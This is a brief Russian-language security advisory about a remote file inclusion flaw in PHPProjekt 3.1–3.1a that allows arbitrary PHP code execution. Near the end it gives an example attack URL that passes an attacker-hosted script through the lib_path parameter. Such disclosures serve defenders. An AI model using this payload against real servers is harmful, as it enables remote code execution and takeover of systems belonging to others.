Выполнение произвольного PHP кода в PHPproject

Дата публикации:
19.03.2002
Дата изменения:
17.10.2006
Всего просмотров:
963
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: PHPProjekt - свободно доступный пакет PHP Groupware от PHPProjekt для Linux, Unix и Microsoft Windows.

Уязвимость в PHPProjekt позволяет нападающему включать произвольные файлы расположенные на удаленном сервере. Если включенный файл - PHP сценарий, то уязвимость позволяет выполнение произвольного кода.

Успешная эксплуатация этой проблемы частично зависит от конфигурации PHP на хосте, выполняющем уязвимое программное обеспечение. Если 'all_url_fopen' установлен в 'off', тогда эксплуатации этой проблемы ограничена.

Уязвимость найдена в PHPProjekt 3.1-3.1a

Пример: http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts

Ссылки: Источник

или введите имя

CAPTCHA